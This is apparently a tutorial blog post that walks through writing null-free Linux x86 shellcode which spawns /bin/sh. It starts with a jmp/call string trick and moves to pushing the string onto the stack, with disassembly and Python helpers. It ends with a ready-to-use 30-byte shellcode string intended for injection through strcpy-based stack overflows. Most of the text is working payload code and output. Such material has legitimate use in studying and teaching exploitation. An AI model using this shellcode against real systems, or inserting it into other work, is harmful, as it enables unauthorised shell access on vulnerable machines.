Most probably you want your shellcode to execute "/bin/sh" on the target box. For that you have to deal with a string, which in a normal program is stored in the data section.
The problem you face when writing shellcode is that you can't just use the data section: your shellcode and the target application use different data sections.
First of all I tried to use the call instruction. When the processor executes call, it automatically pushes the address of the next instruction onto the stack, so esp points to that address. We can use this "feature", keeping in mind that call works with plain addresses: the target can be the address of any instruction, not only the start of a function.
Let's look at the code below:

    .global main

    main:
        jmp two                 # skip ahead to the call
    one:
        movl (%esp), %ebx       # return address = address of "/bin/sh"
        xor %eax, %eax

        pushl %eax              # argv[1] = NULL
        pushl %ebx              # argv[0] = address of "/bin/sh"
        movl %esp, %ecx         # ecx = argv

        xorl %edx, %edx         # edx = envp = NULL

        movl $11, %eax          # 11 = execve
        int $0x80
    two:
        call one                # pushes the address of the string below
        .string "/bin/sh"

Right at the beginning the processor jumps to label two. There it executes call, which pushes the address of the next instruction onto the stack and jumps to label one. Here is the most interesting part: the "next instruction" after "call one" is our string.
So by the time we reach label one, the address of the string "/bin/sh" is on top of the stack, at (%esp).
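The arithmetic behind this trick can be checked with a small sketch. Python is used here only as a calculator; the addresses are the ones from the disassembly of this program shown later in the post, and the helper name call_rel32 is made up for illustration.

```python
import struct

CALL_LEN = 5  # opcode e8 plus a 4-byte relative displacement

def call_rel32(call_addr, target_addr):
    """Return (return address, encoded displacement bytes) for a near call."""
    return_addr = call_addr + CALL_LEN        # what the CPU pushes onto the stack
    displacement = target_addr - return_addr  # relative to the next instruction
    return return_addr, struct.pack("<i", displacement)

# `call one` sits at label two (0x80483c8) and targets label one (0x80483b6)
ret, disp = call_rel32(0x80483c8, 0x80483b6)
print(hex(ret))                              # 0x80483cd, where "/bin/sh" starts
print(" ".join("%02x" % b for b in disp))    # e9 ff ff ff
```

Because the call goes backwards, the displacement is negative and is encoded with ff bytes. A short forward call would have put zero bytes into the displacement, which is presumably why the code jumps forward first and calls back.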
Then the code prepares the registers for the execve system call: the syscall number (11) goes to eax, the path to the executable to ebx, the argv array to ecx and the envp array to edx. I simulated the argv array by pushing values onto the stack and putting the address of the top of the stack into ecx. I don't pass any environment variables, so edx is null.
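To picture what ends up in memory, here is a rough model of the two pushes in Python. It is only a sketch: the initial stack pointer is a hypothetical value picked for illustration, push32 is a made-up helper, and the string address is the one from the disassembly of this program.

```python
import struct

def push32(stack, esp, value):
    """Mimic pushl: move esp down by 4 and store a little-endian 32-bit value."""
    esp -= 4
    stack[esp] = struct.pack("<I", value)
    return esp

STRING_ADDR = 0x80483cd   # address of "/bin/sh", read from (%esp) into ebx
esp = 0xbffff000          # hypothetical stack pointer, for illustration only

stack = {}
esp = push32(stack, esp, 0)            # pushl %eax -> argv[1] = NULL
esp = push32(stack, esp, STRING_ADDR)  # pushl %ebx -> argv[0] = path

# Register state right before int $0x80
registers = {"eax": 11, "ebx": STRING_ADDR, "ecx": esp, "edx": 0}

# Read the argv array back, starting at the address held in ecx
argv = [struct.unpack("<I", stack[registers["ecx"] + 4 * i])[0] for i in range(2)]
print([hex(v) for v in argv])          # ['0x80483cd', '0x0']
```

The array is built back to front because the stack grows towards lower addresses: the NULL terminator is pushed first so that it ends up after the pointer to the path.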
This code is valid and will execute /bin/sh if you compile and run it.

    (~~) gcc test.s -o test
    (~~) ./test
    sh-3.2#

The problem here is that it contains nulls:
    080483b4 <main>:
     80483b4:   eb 12                   jmp    80483c8 <two>

    080483b6 <one>:
     80483b6:   8b 1c 24                mov    (%esp),%ebx
     80483b9:   31 c0                   xor    %eax,%eax
     80483bb:   50                      push   %eax
     80483bc:   53                      push   %ebx
     80483bd:   89 e1                   mov    %esp,%ecx
     80483bf:   31 d2                   xor    %edx,%edx
     80483c1:   b8 0b 00 00 00          mov    $0xb,%eax
     80483c6:   cd 80                   int    $0x80

    080483c8 <two>:
     80483c8:   e8 e9 ff ff ff          call   80483b6 <one>
     80483cd:   2f                      das
     80483ce:   62 69 6e                bound  %ebp,0x6e(%ecx)
     80483d1:   2f                      das
     80483d2:   73 68                   jae    804843c <__libc_csu_init+0x4c>
     80483d4:   00 90 90 90 90 90       add    %dl,-0x6f6f6f70(%eax)
     80483da:   90                      nop
     80483db:   90                      nop
     80483dc:   90                      nop
     80483dd:   90                      nop
     80483de:   90                      nop
     80483df:   90                      nop

The das, bound and jae lines after the call are not real instructions: they are the bytes of "/bin/sh" that the disassembler tried to decode as code.
Almost all stack overflow attacks use a libc string function (such as strcpy) to overwrite the return address of a function together with the shellcode. If the shellcode contains null characters, it will not be copied to the end and the attack will fail.
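To see how much of this first attempt would survive such a copy, here is a small sketch in Python. The bytes are copied by hand from the objdump listing above (without the nop padding), and the two helper names are made up for illustration.

```python
# Machine code of the first program, taken from the objdump listing
FIRST_TRY = bytes.fromhex(
    "eb12"              # jmp two
    "8b1c24"            # mov (%esp),%ebx
    "31c0"              # xor %eax,%eax
    "50" "53"           # push %eax ; push %ebx
    "89e1"              # mov %esp,%ecx
    "31d2"              # xor %edx,%edx
    "b80b000000"        # mov $0xb,%eax
    "cd80"              # int $0x80
    "e8e9ffffff"        # call one
    "2f62696e2f736800"  # "/bin/sh" plus its terminating null
)

def null_offsets(code):
    """Offsets of every zero byte in the code."""
    return [i for i, b in enumerate(code) if b == 0]

def copied_by_strcpy(code):
    """Bytes a strcpy-style copy would transfer: everything before the first null."""
    return code.split(b"\x00", 1)[0]

print(null_offsets(FIRST_TRY))                                 # [15, 16, 17, 32]
print(len(copied_by_strcpy(FIRST_TRY)), "of", len(FIRST_TRY))  # 15 of 33
```

Offsets 15 to 17 belong to the 32-bit immediate of mov $0xb,%eax and offset 32 is the string terminator, so a strcpy-style copy would stop in the middle of the mov instruction.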
The "main" null is the one that terminates our string "/bin/sh". execve doesn't work with strings that are not null-terminated. I tried to write the string as "/bin/shx" and define it with .ascii:

    .ascii "/bin/shx"

and later, at runtime, overwrite the last character with a null, but every time I got a segmentation fault. I suppose this is because the string sits in the code section, which is read-only in a normally built executable, so I was trying to modify read-only memory. This was a dead end for me.
I decided to try another way of defining the string. A string, after all, is an array of bytes, so we can put these bytes somewhere else in some other representation.
Let's look at the string "/bin/sh" from the other side.
    (~~) echo -n "/bin/sh" | hexdump
    0000000 622f 6e69 732f 0068

hexdump prints little-endian 16-bit words, so 622f stands for the bytes 2f 62, that is "/b". The last word is padded with a null, but this is not a problem; we can divide the string into 2-byte chunks:

    622f,6e69,732f,68

And now we can use word-long instructions. Let's look at the updated code of our shell program.
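Before the listing, the chunks and the order in which they have to be pushed can be double-checked with a few lines of Python. This is just a calculator-style sketch, and as_push_words is a made-up name.

```python
import struct

def as_push_words(s):
    """Split a string into little-endian 16-bit words, in the order they must be pushed."""
    data = s.encode("ascii")
    if len(data) % 2:
        data += b"\x00"                   # pad odd lengths with one null byte
    words = struct.unpack("<%dH" % (len(data) // 2), data)
    return list(reversed(words))          # the stack grows down: last word goes first

print([hex(w) for w in as_push_words("/bin/sh")])
# ['0x68', '0x732f', '0x6e69', '0x622f']
```

The words come out in reverse because each push lands at a lower address than the previous one, so the beginning of the string has to be pushed last.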
    .global main

    main:
        xor %eax, %eax

        pushl %eax              # four null bytes to terminate the string
        pushw $0x68             # "h" plus one null byte
        pushw $0x732f           # "/s"
        pushw $0x6e69           # "in"
        pushw $0x622f           # "/b"

        movl %esp, %ebx         # ebx = address of "/bin/sh"

        pushl %eax
        pushl %ebx
        movl %esp, %ecx

        xorl %edx, %edx

        movl $11, %eax
        int $0x80

I pushed word-long chunks of the string onto the stack (first I pushed the zeroed eax to mark the end of the string) and moved the address of the top of the stack to ebx. That's almost all. If you compile this code you will still find some zeros. That's because of the movl $11, %eax instruction: 11 fits into a single byte, but movl takes a 32-bit immediate, so the value is padded to 4 bytes with zeros. Changing movl to movb, with al as the destination, removes these last zeros. Since eax was zeroed by the xor at the start and has not changed since, writing only al still leaves 11 in the whole register. The latest code should look like this:
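    .global main

    main:
        xor %eax, %eax

        pushl %eax              # four null bytes to terminate the string
        pushw $0x68             # "h" plus one null byte
        pushw $0x732f           # "/s"
        pushw $0x6e69           # "in"
        pushw $0x622f           # "/b"

        movl %esp, %ebx         # ebx = address of "/bin/sh"

        pushl %eax              # argv[1] = NULL
        pushl %ebx              # argv[0] = address of "/bin/sh"
        movl %esp, %ecx         # ecx = argv

        xorl %edx, %edx         # edx = envp = NULL

        movb $11, %al           # eax is still zero, so eax = 11 (execve)
        int $0x80

Compiling it and looking at the machine code, I can see that there are no zeros left: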
    080483b4 <main>:
     80483b4:   31 c0                   xor    %eax,%eax
     80483b6:   50                      push   %eax
     80483b7:   66 6a 68                pushw  $0x68
     80483ba:   66 68 2f 73             pushw  $0x732f
     80483be:   66 68 69 6e             pushw  $0x6e69
     80483c2:   66 68 2f 62             pushw  $0x622f
     80483c6:   89 e3                   mov    %esp,%ebx
     80483c8:   50                      push   %eax
     80483c9:   53                      push   %ebx
     80483ca:   89 e1                   mov    %esp,%ecx
     80483cc:   31 d2                   xor    %edx,%edx
     80483ce:   b0 0b                   mov    $0xb,%al
     80483d0:   cd 80                   int    $0x80

The shellcode string will look like this:

    "\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66"
    "\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
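Turning the objdump bytes into such a string by hand is error-prone, so here is one possible way to automate it and to re-check for nulls at the same time. It is only a sketch in Python: the bytes are copied from the final listing, and c_literal is a made-up helper, not part of any tool.

```python
# Machine code of the final program, taken from the objdump listing
FINAL = bytes.fromhex(
    "31c0" "50" "666a68" "66682f73" "6668696e" "66682f62"
    "89e3" "50" "53" "89e1" "31d2" "b00b" "cd80"
)

def c_literal(code, per_line=15):
    """Format raw bytes as adjacent C string literals made of \\x escapes."""
    lines = []
    for start in range(0, len(code), per_line):
        chunk = code[start:start + per_line]
        lines.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "\n".join(lines)

assert 0 not in FINAL     # no null bytes left in the shellcode
print(len(FINAL))         # 30
print(c_literal(FINAL))   # the two quoted lines of \x escapes
```

Adjacent string literals are concatenated by the C compiler, so the two printed lines form a single 30-byte string.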